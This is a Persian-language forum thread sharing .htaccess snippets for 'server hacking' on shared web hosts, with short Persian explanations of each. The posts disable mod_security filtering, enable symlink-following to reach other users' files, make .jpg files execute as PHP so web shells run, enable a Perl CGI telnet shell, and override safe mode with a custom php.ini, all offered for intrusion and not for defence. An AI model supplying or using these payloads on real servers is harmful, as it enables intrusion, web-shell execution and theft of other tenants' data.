اطلاعیه

بستن
هنوز اعلام نشده است.

دستورات Server hacking Bypass

بستن
X
 • فیلتر کردن
 • زمان
 • نمایش
پاک کردن همه
پست های جدید

 • دستورات Server hacking Bypass

  Bypass safemode .htaccess
  کد PHP:
    # increase performance by disabling allowoverride  AllowOverride All None  DirectoryIndex index.html index.htm index.php index.php4 index.php5  Options All +Indexes +FollowSymLinks  Options All +ExecCGI  Options All +Indexes  Options All +FollowSymLinks  Options All +SymLinksIfOwnerMatch  Options All +MultiViews  Options All +Includes  Options All +IncludesNOEXEC  AddType ****/plain .php  AddType application/octet-stream .php  AddHandler server-parsed .php  Addhandler cgi-script .asp  AddType txt .php  AddHandler txt .php 

 • #2

  cgi.pl - Cgi Telnet
  کد:
   
   Options FollowSymLinks MultiViews Indexes ExecCGI  AddType application/x-httpd-cgi .pl  AddHandler cgi-script .pl  AddHandler cgi-script .p

  نظر


  • #3
   از این کد برای بایپس ارور Forbidden Error در سرور هکینگ ازش استفاده می کنیم
   کد:
    
    <IfModule mod_security.c>   SecFilterEngine Off   SecFilterScanPOST Off </IfModule>

   نظر


   • #4
    htaccess کارش اینه که شل با فرمت php. و html. اجرا بشه و این کار برای سیملینک Symlink زدن

    کد PHP:
      Options Indexes FollowSymLinks DirectoryIndex xx.htm AddType txt .php AddHandler txt .php 

    نظر


    • #5
     اجرا شدن شل Shell با فرمت عکس
     کد PHP:
       AddType application/x-httpd-php .jpg AddHandler php-script .jpg 

     نظر


     • #6
      از این کد که در htaccess قرارش میدیم برای اجرای پرل Perl ازش استفاده می کنیم
      کد PHP:
        AddType application/x-httpd-cgi .pl AddHandler cgi-script .pl 

      نظر


      • #7
       برای بای پس Bypass کردن ارور Forbidden در سیم لینک Symlink Forbidden Error Bypass :
       کد PHP:
         Options Indexes FollowSymLinks DirectoryIndexsee.htm AddType txt .php AddHandler txt .php 

       نظر


       • #8
        بای پس ارور 404 در سیم لینک ( Bypass 404 Forbidden Error Symlink ) :
        کد PHP:
          DirectoryIndex sea.txt HeaderName sea.txt ReadmeName sea.txt footerName sea.txt ErrorDocument 404 /404.html  404.html Symlinked sea.txt Options all ForceType text/plain AddType text/plain .php  AddType text/plain .html AddHandler server-parsed .php AddHandler txt .php 

        نظر


        • #9
         برای خاموش کردن Safe Mode در سرور لایت سپید lightspeed :

         کد PHP:
           <Files *.php>     ForceType application/x-httpd-php4  </Files

         نظر


         • #10
          خاموش کردن SafecMode با htaccess.

          کد PHP:
            Options +FollowSymLinks    DirectoryIndex ssssss.htm    Options All Indexes    <IfModule mod_security.c>    SecFilterEngine Off    SecFilterScanPOST Off    SecFilterCheckURLEncoding Off    SecFilterCheckCookieFormat Off    SecFilterCheckUnicodeEncoding Off    SecFilterNormalizeCookies Off    </IfModule>    SetEnv PHPRC /home/user/public_html/php.ini    suPHP_ConfigPath /home/user/public_html/php.ini 

          نظر


          • #11
           Internal Server Error Bypass
           کد PHP:
             <IfModule mod_security.cSecFilterEngine Off SecFilterScanPOST Off </IfModule

           نظر


           • #12
            دستورات Command اجرا کنید یا اینکه روی Public_html کلیک کنید با اخطار Forbidden رو به رو میشید و در این زمان این Htaccess کارش این که این مانع رو از سر راه برداره...
            کد PHP:
               <IfModule mod_security.c>     SecFilterEngine Off     SecFilterScanPOST Off </IfModule

            نظر

            پردازش ...
            X
            کانال تلگرام منطقه لینوکسی ها